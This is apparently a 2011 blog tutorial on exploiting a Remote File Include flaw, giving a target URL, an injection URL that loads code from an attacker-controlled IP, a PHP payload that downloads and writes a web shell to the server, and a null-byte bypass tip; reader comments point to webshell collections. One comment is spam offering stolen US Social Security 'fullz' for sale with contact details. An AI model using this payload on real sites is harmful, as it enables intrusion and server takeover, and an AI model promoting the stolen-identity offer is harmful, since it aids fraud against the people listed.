Saturday 5 March 2011

How to exploit RFI (Remote File Include) vulnerability on webpages.



Hi everyone, this post is really similar to the one that I just made ( LFI ), the only difference is that you can include your own code into the remote server more easily.
So, this is our vuln wepage :
http://mytargettest.com/hacktest/rfi.php?COLOR=color.css
BUT instead loading the file color.css, we will be loading our own code to that box like this :

http://mytargettest.com/hacktest/rfi.php?COLOR=http://172.16.1.79/exploits/evil3.txt

The content of evil3.txt is :

<?php $z=fopen('./shell.php','w');fwrite($z,file_get_contents('http://172.16.1.79/exploits/back.txt'));fclose($z); ?>

If you notice the extension of the file is .txt, there is a reason for that, if you put .php, the code will be interpreted by the pentest server instead the target server, don't forget to put .txt in your evil code.
Great, we just uploaded our shell to the server now browse it : http://mytargettest.com/hacktest/shell.php
Now you can just repeat what I did in the LFI post to get your real shell in the server.

Another Tip: Some developers try to include the extension like .css or .php or .any other extension, ok, so how can we avoid that? You just add a NULLBYTE in the end of the URL.

7 comments:

  1. You should read the whole post.
    "If you notice the extension of the file is .txt, there is a reason for that, if you put .php, the code will be interpreted by the pentest server instead the target server, don't forget to put .txt in your evil code."

    ReplyDelete
    Replies
    1. I mean, the file back.txt at that site because there is not active.
      Where can I find it?
      Can you send me by mail?

      Delete
  2. back.txt is your "evil" code, that can be anything... your shell, commands, anything... if you want a shell, inside backtrack there is some in /pentest/backdoors/web/webshells/

    Have a look.
    I don't speak italian.

    ReplyDelete
  3. OOOOOOOOOkay, now i understand :)
    Thanks a lot!

    ReplyDelete
  4. Hello Everyone !

    USA SSN Leads/Fullz available, along with Driving License/ID Number with good connectivity.

    All SSN's are Tested & Verified.

    **DETAILS IN LEADS/FULLZ**

    ->FULL NAME
    ->SSN
    ->DATE OF BIRTH
    ->DRIVING LICENSE NUMBER
    ->ADDRESS WITH ZIP
    ->PHONE NUMBER, EMAIL
    ->EMPLOYEE DETAILS

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If you buy in bulk, will give you discount
    *Sampling is just for serious buyers

    ->Hope for the long term business
    ->You can buy for your specific states too

    **Contact 24/7**

    Whatsapp > +923172721122

    Email > leads.sellers1212@gmail.com

    Telegram > @leadsupplier

    ICQ > 752822040

    ReplyDelete